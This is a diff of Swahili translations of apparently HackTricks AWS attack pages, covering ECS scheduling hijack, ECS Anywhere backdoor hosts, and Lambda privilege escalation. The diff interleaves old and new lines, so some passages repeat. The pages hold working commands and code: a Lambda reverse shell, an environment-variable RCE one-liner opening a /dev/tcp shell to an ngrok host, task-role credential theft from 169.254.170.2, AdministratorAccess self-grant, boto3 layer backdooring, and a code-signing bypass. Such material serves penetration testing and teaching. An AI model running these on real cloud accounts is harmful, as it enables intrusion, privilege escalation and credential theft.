### Kunyang'anya Upangaji wa ECS kupitia Capacity Provider ya Hasidi (uchukuzi wa EC2 ASG)
Mshambulizi mwenye ruhusa za kusimamia ECS capacity providers na kusasisha huduma anaweza kuunda EC2 Auto Scaling Group anayedhibiti, kuiweka ndani ya ECS Capacity Provider, kuihusisha na cluster lengwa, na kuhama huduma ya mwathiriwa ili itumie provider hii. Kisha tasks zitawekwa kwenye instances za EC2 zinazodhibitiwa na mshambuliaji, ikiruhusu ufikiaji wa ngazi ya OS kwa kukagua containers na kuiba credentials za task role.
Commands (us-east-1):
@@ -344,7 +344,7 @@ Commands (us-east-1):
- Unda Auto Scaling Group
- Create Auto Scaling Group
@@ -352,29 +352,29 @@ Commands (us-east-1):
- Unganisha the Capacity Provider na cluster (hiari kama default)
- Associate the Capacity Provider to the cluster (optionally as default)
- Hamisha service kwa provider yako
- Migrate a service to your provider
- Thibitisha tasks zimepangwa kwenye EC2 instances za mshambulizi
- Verify tasks land on attacker instances
- Hiari: Kutoka kwenye EC2 node, docker exec ndani ya target containers na soma http://169.254.170.2 ili kupata task role credentials.
- Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.
- Usafishaji
- Cleanup
**Potential Impact:** EC2 nodes zinazosimamiwa na mshambulizi zinapokea victim tasks, zikiruhusu ufikiaji wa ngazi ya OS kwenye containers na wizi wa task IAM role credentials.
**Athari Inayowezekana:** Node za EC2 zinazoendeshwa na mshambuliaji zinapokea tasks za mwathiriwa, kuruhusu ufikiaji wa ngazi ya OS kwenye containers na wizi wa credentials za IAM za task.
<details>
<summary>Step-by-step commands (copy/paste)</summary>
<summary>Amri hatua kwa hatua (nakili/paste)</summary>
<pre>
export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster
@@ -407,21 +407,21 @@ aws ecs describe-container-instances --cluster "" --container-instances "" --que
</pre>
</details>
### Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration
### Kufungua Njia ya Nyuma kwenye compute ndani ya cluster kupitia ECS Anywhere EXTERNAL registration
Dhulumuza ECS Anywhere kujiandikisha host inayodhibitiwa na mshambulizi kama EXTERNAL container instance katika victim ECS cluster na kuendesha tasks kwenye host hiyo ukitumia privileged task na execution roles. Hii inatoa udhibiti wa ngazi ya OS juu ya mahali tasks zinaendeshwa (kompyuta yako mwenyewe) na kuruhusu wizi wa credentials/data kutoka kwa tasks na volumes zilizoambatishwa bila kugusa capacity providers au ASGs.
Tumia vibaya ECS Anywhere kusajili mwenyeji unaodhibitiwa na mshambuliaji kama EXTERNAL container instance katika cluster ya mwathiriwa ya ECS na kuendesha tasks kwenye mwenyeji huyo ukitumia privileged task na execution roles. Hii inatoa udhibiti wa ngazi ya OS juu ya mahali tasks zinaendeshwa (kompyuta yako mwenyewe) na kuruhusu wizi wa credentials/data kutoka kwa tasks na volumes zilizoambatishwa bila kugusa capacity providers au ASGs.
- Required perms (mfano minimal):
- Ruhusa zinazohitajika (mfano minimal):
- ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
- ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
- iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and task/execution roles)
- logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)
- Athari: Endesha containers yoyote kwa taskRoleArn uliyochagua kwenye host ya mshambulizi; safirisha nje task-role credentials kutoka 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; pata ufikiaji wa volumes zozote zilizoambatishwa na tasks; njia hii ni ya siri zaidi kuliko kuingilia capacity providers/ASGs.
- Athari: Endesha containers yoyote ukiwa umechagua taskRoleArn kwenye mwenyeji wa mshambuliaji; toa credentials za task-role kutoka 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; pata ufikiaji wa volumes zozote zilizo montwa na tasks; ni stealthier kuliko kuingilia capacity providers/ASGs.
Steps
Hatua
1) Unda/tambua cluster (us-east-1)
1) Unda/au tambua cluster (us-east-1)
```bash
aws ecs create-cluster --cluster-name ht-ecs-anywhere
```
@@ -434,7 +434,7 @@ aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam:
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)
```
3) Andaa attacker host na uisajilishe kiotomatiki kama EXTERNAL (mfano: AL2 EC2 ndogo kama “onprem”)
3) Tayarisha mwenyeji wa mshambuliaji na ujiandikishe moja kwa moja kama EXTERNAL (mfano: EC2 ndogo ya AL2 kama “onprem”)
<details>
<summary>user-data.sh</summary>
@@ -455,7 +455,7 @@ IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
--user-data file://user-data.sh --query 'Instances[0].InstanceId' --output text)
aws ec2 wait instance-status-ok --instance-ids $IID
```
4) Thibitisha kwamba instance ya container ya EXTERNAL imejiunga
4) Thibitisha EXTERNAL container instance imejiunga
```bash
aws ecs list-container-instances --cluster ht-ecs-anywhere
aws ecs describe-container-instances --cluster ht-ecs-anywhere \
@@ -498,26 +498,26 @@ CI=$(aws ecs list-container-instances --cluster ht-ecs-anywhere --query 'contain
aws ecs start-task --cluster ht-ecs-anywhere --task-definition ht-external \
--container-instances $CI
```
6) Kutoka hapa unadhibiti host inayofanya tasks kazi. Unaweza kusoma task logs (ikiwa awslogs) au moja kwa moja kufanya exec kwenye host ili kuiba credentials/data kutoka kwa tasks zako.
6) Kutoka hapa unadhibiti host inayotekeleza tasks. Unaweza kusoma task logs (ikiwa awslogs) au kufanya exec moja kwa moja kwenye host ili exfiltrate credentials/data kutoka kwa tasks zako.
#### Mfano wa amri (vibadilishaji)
#### Mfano wa amri (placeholders)
### Kukamata ECS Scheduling kupitia Malicious Capacity Provider (EC2 ASG takeover)
### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
Mshambulizi mwenye ruhusa za kusimamia ECS capacity providers na kusasisha services anaweza kuunda EC2 Auto Scaling Group anayotawala, kuiweka ndani ya ECS Capacity Provider, kuihusisha na cluster lengwa, na kuhama service ya mwathiriwa ili itumie provider hii. Tasks kisha zitatangazwa kwenye EC2 instances zinazodhibitiwa na mshambulizi, zikiruhusu ufikiaji wa ngazi ya OS ili kukagua containers na kuiba task role credentials.
An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it to the target cluster, and migrate a victim service to use this provider. Tasks will then be scheduled onto attacker-controlled EC2 instances, allowing OS-level access to inspect containers and steal task role credentials.
Commands (us-east-1):
Amri (us-east-1):
- Mahitaji ya awali
- Unda Launch Template kwa ECS agent kujiunga na cluster lengwa
- Unda Launch Template kwa ajili ya ECS agent kujiunga na target cluster
@@ -529,22 +529,23 @@ Commands (us-east-1):
- Husisha Capacity Provider kwenye cluster (hiari kama chaguo-msingi)
- Husisha Capacity Provider na cluster (hiari kama default)
- Hamisha service ili itumie provider yako
- Hamisha service kwa provider yako
- Thibitisha tasks zimepangwa kwenye instances za mshambulizi
- Thibitisha tasks zinaenda kwenye attacker-controlled EC2 instances
- Hiari: Kutoka kwenye node ya EC2, docker exec ndani ya target containers na soma http://169.254.170.2 ili kupata task role credentials.
- Hiari: Kutoka kwenye EC2 node, tumia docker exec ndani ya target containers na soma http://169.254.170.2 kupata task role credentials.
- Usafishaji
**Potential Impact:** EC2 nodes zinazodhibitiwa na mshambulizi zinapokea victim tasks, zikiruhusu ufikiaji wa ngazi ya OS kwenye containers na wizi wa task IAM role credentials.
**Madhara Yanayowezekana:** EC2 nodes zinazodhibitiwa na attacker zitapokea victim tasks, kuruhusu OS-level access kwa containers na wizi wa task IAM role credentials.
{{#include ../../../../banners/hacktricks-training.md}}

114
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc/README.md
View File

@@ -4,7 +4,7 @@
## lambda
Taarifa zaidi kuhusu lambda ziko katika:
Taarifa zaidi kuhusu lambda katika:
{{#ref}}
../../aws-services/aws-lambda-enum.md
@@ -12,11 +12,11 @@ Taarifa zaidi kuhusu lambda ziko katika:
### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)
Watumiaji walio na ruhusa za **`iam:PassRole`, `lambda:CreateFunction`, na `lambda:InvokeFunction`** wanaweza kuongeza hadhi zao.\\
Wanaweza **kuunda Lambda function mpya na kuiweka IAM role iliyopo**, ikimpa function hiyo ruhusa zinazohusiana na role hiyo. Mtumiaji kisha anaweza **kuandika na kupakia msimbo kwenye Lambda function hii (kwa mfano kwa rev shell)**.\\
Mara function itakapowekwa, mtumiaji anaweza **kusababisha utekelezaji wake** kwa kuinvoke Lambda function kupitia AWS API. Njia hii inamruhusu mtumiaji kufanya kazi kwa njia isiyo ya moja kwa moja kupitia Lambda function, akifanya kazi kwa kiwango cha upatikanaji kilichopewa IAM role inayohusishwa nayo.\\
Watumiaji wenye ruhusa za **`iam:PassRole`, `lambda:CreateFunction`, na `lambda:InvokeFunction`** wanaweza kuinua kiwango cha ruhusa zao.\\
Wanaweza **kuunda Lambda function mpya na kuiambatanisha na IAM role iliyopo**, na kumpa function hiyo ruhusa zinazohusiana na role hiyo. Mtumiaji anaweza kisha **kuandika na kupakia code kwenye Lambda function hii (kwa mfano na rev shell)**.\\
Mara function itakapowekwa, mtumiaji anaweza **kuamsha utekelezaji wake** na vitendo vilivyokusudiwa kwa kuitisha Lambda function kupitia AWS API. Njia hii inamruhusu mtumiaji kutekeleza kazi kwa njia isiyo ya moja kwa moja kupitia Lambda function, akifanya kazi kwa kiwango cha upatikanaji kilichotolewa kwa IAM role inayohusishwa nayo.\\
Mshambuliaji anaweza kutumia hili kupata **rev shell na kuiba token**:
Mshambulizi anaweza kutumia hili kupata **rev shell na kuiba token**:
```python:rev.py
import socket,subprocess,os,time
def lambda_handler(event, context):
@@ -46,8 +46,8 @@ aws lambda invoke --function-name my_function output.txt
# List roles
aws iam list-attached-user-policies --user-name <user-name>
```
Unaweza pia **abuse the lambda role permissions** kutoka kwenye lambda function yenyewe.\
Ikiwa lambda role ingekuwa na permissions za kutosha, ungeweza kuitumia kukupe admin rights:
Unaweza pia **kutumia vibaya ruhusa za role ya lambda** kutoka kwenye lambda function yenyewe.\
Ikiwa role ya lambda ingekuwa na ruhusa za kutosha ungeweza kuitumia kukupa haki za admin:
```python
import boto3
def lambda_handler(event, context):
@@ -58,7 +58,7 @@ PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return response
```
Pia inawezekana kufanya leak ya lambda's role credentials bila kuhitaji muunganisho wa nje. Hii itakuwa muhimu kwa **Network isolated Lambdas** zinazotumika kwa kazi za ndani. Ikiwa kuna security groups zisizojulikana zinazochuja reverse shells zako, kipande hiki cha code kitakuwezesha leak moja kwa moja credentials kama output ya lambda.
Pia inawezekana ku-leak credentials za role ya lambda bila kuhitaji external connection. Hii itakuwa muhimu kwa **Lambdas zilizo katengwa kwa mtandao** zinazotumika kwa kazi za ndani. Ikiwa kuna security groups zisizojulikana zinazochuja reverse shells zako, kipande hiki cha code kitakuwezesha ku-leak credentials moja kwa moja kama output ya lambda.
```python
def handler(event, context):
sessiontoken = open('/proc/self/environ', "r").read()
@@ -72,34 +72,34 @@ return {
aws lambda invoke --function-name <lambda_name> output.txt
cat output.txt
```
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa role ya service ya lambda isiyobainishwa iliyotajwa.
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa role yoyote ya huduma ya lambda iliyotajwa.
> [!CAUTION]
> Kumbuka kwamba, hata kama inaweza kuonekana kuvutia, **`lambda:InvokeAsync`** **haiwezi** pekee yake kuruhusu kutekeleza **`aws lambda invoke-async`**; pia unahitaji `lambda:InvokeFunction`
> Kumbuka kwamba hata kama inaweza kuonekana kuvutia **`lambda:InvokeAsync`**, **haitaruhusu** peke yake **kuendesha `aws lambda invoke-async`**; pia unahitaji `lambda:InvokeFunction`
### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`
Kama katika tukio la awali, unaweza **kujipa ruhusa ya `lambda:InvokeFunction`** ikiwa una ruhusa ya **`lambda:AddPermission`**
Kama katika tukio lililopita, unaweza **kujipa ruhusa ya `lambda:InvokeFunction`** ikiwa una ruhusa **`lambda:AddPermission`**
```bash
# Check the previous exploit and use the following line to grant you the invoke permissions
aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
```
**Athari Inayoweza Kutokea:** Direct privesc kwa lambda service role yoyote iliyoainishwa.
**Potential Impact:** Direct privesc kwa role yoyote ya lambda service iliyotajwa.
### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`
Watumiaji wenye **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** ruhusa (na pengine `dynamodb:PutItem` na `dynamodb:CreateTable`) wanaweza kwa njia isiyo ya moja kwa moja **escalate privileges** hata bila `lambda:InvokeFunction`.\
Wanaweza kuunda **Lambda function** yenye msimbo hatari na kuiipa **IAM role** iliyopo.
Watumiaji walio na ruhusa **`iam:PassRole`, `lambda:CreateFunction`, na `lambda:CreateEventSourceMapping`** (na pengine `dynamodb:PutItem` na `dynamodb:CreateTable`) wanaweza kwa njia isiyo ya moja kwa moja **escalate privileges** hata bila `lambda:InvokeFunction`.\
Wanaweza kuunda **Lambda function yenye malicious code na kuipa IAM role iliyopo**.
Badala ya kuituma moja kwa moja Lambda, mtumiaji huanzisha au kutumia jedwali la DynamoDB lililopo, na kuiunganisha na Lambda kupitia event source mapping. Mipangilio hii inahakikisha Lambda function inachochewa moja kwa moja **wakati kipengee kipya kinaingizwa** kwenye jedwali, iwe ni kwa kitendo cha mtumiaji au mchakato mwingine, na hivyo kwa njia isiyo ya moja kwa moja kuitisha Lambda function na kutekeleza msimbo kwa ruhusa za IAM role iliyopitishwa.
Badala ya kuiita Lambda moja kwa moja, mtumiaji anaweka au anatumia jedwali la DynamoDB lililopo, akiulianisha na Lambda kupitia event source mapping. Mipangilio hii inahakikisha Lambda function **inachochewa kiotomatiki mara kipengee kipya kinaingizwa** kwenye jedwali, iwe kwa hatua ya mtumiaji au mchakato mwingine, na hivyo kuitisha kwa njia isiyo ya moja kwa moja Lambda function na kutekeleza code kwa ruhusa za IAM role iliyotumwa.
```bash
aws lambda create-function --function-name my_function \
--runtime python3.8 --role <arn_of_lambda_role> \
--handler lambda_function.lambda_handler \
--zip-file fileb://rev.zip
```
Ikiwa DynamoDB tayari inafanya kazi katika mazingira ya AWS, mtumiaji anahitaji tu **kuanzisha event source mapping** kwa Lambda function. Hata hivyo, ikiwa DynamoDB haijatumiwa, mtumiaji lazima **kuunda jedwali jipya** lenye streaming imewezeshwa:
Ikiwa DynamoDB tayari inafanya kazi katika mazingira ya AWS, mtumiaji anahitaji tu **kuanzisha event source mapping** kwa Lambda function. Hata hivyo, ikiwa DynamoDB haisitumiki, mtumiaji lazima **aunde jedwali jipya** lenye streaming imewezeshwa:
```bash
aws dynamodb create-table --table-name my_table \
--attribute-definitions AttributeName=Test,AttributeType=S \
@@ -107,22 +107,22 @@ aws dynamodb create-table --table-name my_table \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
```
Sasa inawezekana **connect the Lambda function to the DynamoDB table** kwa **creating an event source mapping**:
Sasa inawezekana **kuunganisha Lambda function na jedwali la DynamoDB** kwa **kuunda event source mapping**:
```bash
aws lambda create-event-source-mapping --function-name my_function \
--event-source-arn <arn_of_dynamodb_table_stream> \
--enabled --starting-position LATEST
```
Kwa kuwa Lambda function imeunganishwa na DynamoDB stream, attacker anaweza **indirectly trigger the Lambda by activating the DynamoDB stream**. Hii inaweza kufanywa kwa **inserting an item** kwenye DynamoDB table:
Kwa kuwa kazi ya Lambda imeunganishwa na stream ya DynamoDB, mshambuliaji anaweza **kuanzisha Lambda kwa njia isiyo ya moja kwa moja kwa kuamsha stream ya DynamoDB**. Hii inaweza kufanyika kwa **kuingiza kipengee** kwenye jedwali la DynamoDB:
```bash
aws dynamodb put-item --table-name my_table \
--item Test={S="Random string"}
```
**Madhara Yanayowezekana:** Privesc ya moja kwa moja kwa role ya huduma ya lambda iliyotajwa.
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa lambda service role iliyotajwa.
### `lambda:AddPermission`
Mshambuliaji akiwa na ruhusa hii anaweza **kujipa (au kuwapa wengine) ruhusa yoyote** (hii inaunda resource based policies ili kutoa ufikiaji kwa rasilimali):
Mshambuliaji mwenye ruhusa hii anaweza **kujipa (au kuwapa wengine) ruhusa yoyote** (hii inazalisha resource based policies za kuipa ufikiaji rasilimali):
```bash
# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>
@@ -130,11 +130,11 @@ aws lambda add-permission --function-name <func_name> --statement-id asdasd --ac
# Invoke the function
aws lambda invoke --function-name <func_name> /tmp/outout
```
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa lambda service role inayotumiwa kwa kupewa ruhusa ya kubadilisha code na kuiendesha.
**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa cheo cha huduma cha lambda kwa kumpa ruhusa ya kubadilisha code na kuendesha.
### `lambda:AddLayerVersionPermission`
Mshambuliaji mwenye ruhusa hii anaweza **kujiwekea (au kuwapa wengine) ruhusa ya `lambda:GetLayerVersion`**. Anaweza kufikia layer na kutafuta udhaifu au taarifa nyeti
Mshambuliaji mwenye ruhusa hii anaweza **kumpa yeye mwenyewe (au wengine) ruhusa `lambda:GetLayerVersion`**. Anaweza kupata layer na kutafuta udhaifu au taarifa nyeti
```bash
# Give everyone the permission lambda:GetLayerVersion
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
@@ -143,10 +143,10 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen
### `lambda:UpdateFunctionCode`
Watumiaji wanaomiliki ruhusa ya **`lambda:UpdateFunctionCode`** wanaweza **kubadilisha msimbo wa Lambda function iliyopo ambayo imeunganishwa na IAM role.**\
Mvamizi anaweza **modify the code of the lambda to exfiltrate the IAM credentials**.
Watumiaji wanaomiliki ruhusa ya **`lambda:UpdateFunctionCode`** wanaweza **kubadilisha msimbo wa Lambda uliopo uliounganishwa na IAM role.**\
Mshambuliaji anaweza **kubadilisha msimbo wa Lambda ili exfiltrate the IAM credentials**.
Ingawa mvamizi huenda hana uwezo wa moja kwa moja wa kuamsha function, ikiwa Lambda function tayari ipo na inafanya kazi, kuna uwezekano itachochewa kupitia workflows au matukio yaliyopo, na hivyo kwa njia isiyo ya moja kwa moja kurahisisha utekelezaji wa msimbo uliobadilishwa.
Ingawa mshambuliaji anaweza asiwe na uwezo wa moja kwa moja wa kuitisha Lambda function, ikiwa Lambda function tayari ipo na inafanya kazi, kuna uwezekano itachochewa kupitia workflows au events zilizopo, hivyo kwa njia isiyo ya moja kwa moja kuwezesha utekelezaji wa msimbo uliobadilishwa.
```bash
# The zip should contain the lambda code (trick: Download the current one and add your code there)
aws lambda update-function-code --function-name target_function \
@@ -157,17 +157,17 @@ aws lambda invoke --function-name my_function output.txt
# If not check if it's exposed in any URL or via an API gateway you could access
```
**Athari Inayoweza Kutokea:** Direct privesc kwa lambda service role inayotumika.
**Athari Zinazoweza Kutokea:** Privesc ya moja kwa moja kwa lambda service role inayotumika.
### `lambda:UpdateFunctionConfiguration`
#### RCE via env variables
#### RCE kupitia env variables
Kwa ruhusa hizi inawezekana kuongeza environment variables ambazo zitasababisha Lambda kutekeleza arbitrary code. Kwa mfano, katika python inawezekana kutumia environment variables `PYTHONWARNING` na `BROWSER` kumfanya mchakato wa python utekeleze amri yoyote:
Kwa ruhusa hizi inawezekana kuongeza environment variables ambazo zitasababisha Lambda kutekeleza arbitrary code. Kwa mfano, katika python inawezekana kutumia vibaya environment variables `PYTHONWARNING` na `BROWSER` ili kufanya mchakato wa python kutekeleza amri yoyote:
```bash
aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
```
Kwa lugha nyingine za scripting kuna env variables nyingine unazoweza kutumia. Kwa taarifa zaidi angalia sehemu ndogo za scripting languages katika:
Kwa lugha nyingine za scripting kuna env variables nyingine unazoweza kutumia. Kwa habari zaidi angalia sehemu ndogo za scripting languages katika:
{{#ref}}
https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html
@@ -175,9 +175,9 @@ https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-esc
#### RCE via Lambda Layers
[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) inaruhusu kujumuisha **code** katika lamdba function yako lakini **kuihifadhi kando**, hivyo function code inaweza kubaki ndogo na **several functions can share code**.
[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) inaruhusu kujumuisha **code** katika yako lamdba function lakini **kuihifadhi kando**, hivyo function code inaweza kubaki ndogo na **several functions can share code**.
Ndani ya lambda unaweza kuangalia paths kutoka ambako python code inapakiwa kwa kutumia function kama ifuatayo:
Ndani ya lambda unaweza kuangalia paths kutoka ambapo python code inapakiwa kwa function kama ifuatayo:
```python
import json
import sys
@@ -185,7 +185,7 @@ import sys
def lambda_handler(event, context):
print(json.dumps(sys.path, indent=2))
```
Hapa ni maeneo:
Haya ni maeneo:
1. /var/task
2. /opt/python/lib/python3.7/site-packages
@@ -198,82 +198,82 @@ Hapa ni maeneo:
9. /opt/python/lib/python3.7/site-packages
10. /opt/python
Kwa mfano, library boto3 inachomwa kutoka `/var/runtime/boto3` (nafasi ya 4).
Kwa mfano, maktaba boto3 inachomwa kutoka `/var/runtime/boto3` (nafasi ya 4).
#### Utekelezaji
#### Exploitation
Inawezekana kutumia vibaya ruhusa `lambda:UpdateFunctionConfiguration` ili **kuongeza layer mpya** kwa lambda function. Ili kuendesha arbitrary code layer hii inahitaji kuwa na baadhi ya **library ambayo lambda itakayoiimport.** Ikiwa unaweza kusoma code ya lambda, unaweza kupata hili kwa urahisi; pia kumbuka inaweza kuwa lambda inatumia **layer tayari** na unaweza **kupakua** layer hiyo na **kuongeza code yako** humo.
Inawezekana kutumia vibaya ruhusa `lambda:UpdateFunctionConfiguration` ili **kuongeza layer mpya** kwa lambda function. Ili kutekeleza msimbo wowote layer hii inahitaji kuwa na baadhi ya **maktaba ambayo lambda itakayoi-import.** Ikiwa unaweza kusoma msimbo wa lambda, unaweza kupata hili kwa urahisi; pia angalia kwamba inawezekana lambda tayari inatumia **layer** na unaweza **kupakua** layer hiyo na **kuongeza msimbo wako** ndani yake.
Kwa mfano, tukichukulia kuwa lambda inatumia library boto3, hii itaunda layer ya ndani yenye toleo la mwisho la library:
Kwa mfano, tukikisia kwamba lambda inatumia maktaba boto3, hii itaunda layer ya ndani yenye toleo la mwisho la maktaba:
```bash
pip3 install -t ./lambda_layer boto3
```
Unaweza kufungua `./lambda_layer/boto3/__init__.py` na **ongeza the backdoor katika global code** (mfano: function ya exfiltrate credentials au kupata reverse shell).
Unaweza kufungua `./lambda_layer/boto3/__init__.py` na **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).
Kisha, zipi saraka hiyo `./lambda_layer` na **upload the new lambda layer** kwenye account yako (au kwenye account ya victim, lakini huenda huna permissions kwa hili).\
Kumbuka kwamba unahitaji kuunda folder ya python na kuweka libraries ndani yake ili ku-override /opt/python/boto3. Pia, layer inapaswa kuwa **compatible with the python version** inayotumika na lambda, na ikiwa utaileta kwenye account yako, inapaswa kuwa katika **same region:**
Kisha, zip katalogi hiyo `./lambda_layer` na **upload the new lambda layer** kwenye account yako mwenyewe (au kwenye akaunti ya waathiriwa, lakini huenda huna idhinisho za kufanya hivyo).\
Kumbuka kwamba unahitaji kuunda python folder na kuweka libraries huko ili ku-override /opt/python/boto3. Pia, layer inapaswa kuwa **compatible with the python version** inayotumika na lambda na kama utaipakia kwenye account yako, inapaswa kuwa katika **same region:**
```bash
aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
```
Sasa, fanya lambda layer iliyopakiwa **ifikike kwa akaunti yoyote**:
Sasa, fanya lambda layer iliyopakiwa **iwe inapatikana kwa akaunti yoyote**:
```bash
aws lambda add-layer-version-permission --layer-name boto3 \
--version-number 1 --statement-id public \
--action lambda:GetLayerVersion --principal *
```
Na ambatanisha lambda layer kwenye victim lambda function:
Na ambatisha lambda layer kwa victim lambda function:
```bash
aws lambda update-function-configuration \
--function-name <func-name> \
--layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
--timeout 300 #5min for rev shells
```
Hatua inayofuata itakuwa ama **kuiita function** wenyewe ikiwa tunaweza au kusubiri hadi i**itaitwa** kwa njia ya kawaidaambayo ni njia salama zaidi.
Hatua inayofuata itakuwa au **invoke the function** wenyewe ikiwa tunaweza au kusubiri hadi i**t gets invoked** kwa njia za kawaidaambayo ni njia salama zaidi.
A **njia ya kimya zaidi ya kutumia exploit hii** inaweza kupatikana katika:
A **more stealth way to exploit this vulnerability** inaweza kupatikana katika:
{{#ref}}
../../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
{{#endref}}
**Potential Impact:** Privesc ya moja kwa moja kwa lambda service role iliyotumika.
**Athari Inayoweza Kutokea:** Direct privesc to the lambda service role used.
### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`
Labda kwa ruhusa hizo unaweza kuunda function na kuiendesha ukiipigia URL... lakini sikuweza kupata njia ya kuijaribu, kwa hivyo nijulishe ikiwa utaweza!
Labda kwa permissions hizo utaweza kuunda function na kuiendesha kwa kuitumia URL... lakini sikuweza kupata njia ya kuipima, hivyo nijulishe ukifaulu!
### Lambda MitM
Baadhi ya lambdas zitakuwa **zikipokea taarifa nyeti kutoka kwa watumiaji katika parameters.** Ikiwa upata RCE katika moja yao, unaweza exfiltrate taarifa ambazo watumiaji wengine wanazituma, angalia katika:
Baadhi ya lambdas zitakuwa zikipokea taarifa zenye nyeti kutoka kwa watumiaji kama parameters. Ikiwa utapata RCE kwenye moja yao, unaweza exfiltrate taarifa ambazo watumiaji wengine wanazituma kwa hiyo, angalia katika:
{{#ref}}
../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
{{#endref}}
## References
## Marejeo
- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
{{#include ../../../../banners/hacktricks-training.md}}
### `lambda:DeleteFunctionCodeSigningConfig` or `lambda:PutFunctionCodeSigningConfig` + `lambda:UpdateFunctionCode` — Bypass Lambda Code Signing
Ikiwa Lambda function inasimamia code signing, mshambuliaji ambaye anaweza kuondoa Code Signing Config (CSC) au kuipunguza hadi Warn anaweza kuweka code isayosainiwa kwenye function. Hii inapita ulinzi wa uadilifu bila kubadilisha IAM role ya function au triggers.
Ikiwa Lambda function inalazimisha code signing, mshambuliaji anayeweza kuondoa Code Signing Config (CSC) au kuipunguza hadi Warn anaweza kupeleka unsigned code kwenye function. Hii inavuka ulinzi wa uadilifu bila kubadilisha function's IAM role au triggers.
Permissions (moja kati ya):
Permissions (one of):
- Path A: `lambda:DeleteFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
- Path B: `lambda:CreateCodeSigningConfig`, `lambda:PutFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
Notes:
- Kwa Path B, hauitaji AWS Signer profile ikiwa sera ya CSC imewekwa kuwa `WARN` (unsigned artifacts zinazoruhusiwa).
- Kwa Path B, hutaji AWS Signer profile ikiwa sera ya CSC imewekwa `WARN` (unsigned artifacts allowed).
Steps (REGION=us-east-1, TARGET_FN=<target-lambda-name>):
Hatua (REGION=us-east-1, TARGET_FN=<target-lambda-name>):
Prepare a small payload:
Tayarisha payload ndogo:
```bash
cat > handler.py <<'PY'
import os, json
@@ -292,7 +292,7 @@ aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://ba
# If the handler name changed, also run:
aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
```
Njia B) Downgrade to Warn na sasisha code (kama delete haikiruhusiwi):
Njia B) Punguza hadi Warn na sasisha msimbo (ikiwa kufuta hakuruhusiwi):
```bash
CSC_ARN=$(aws lambda create-code-signing-config \
--description ht-warn-csc \
@@ -303,15 +303,15 @@ aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://ba
# If the handler name changed, also run:
aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
```
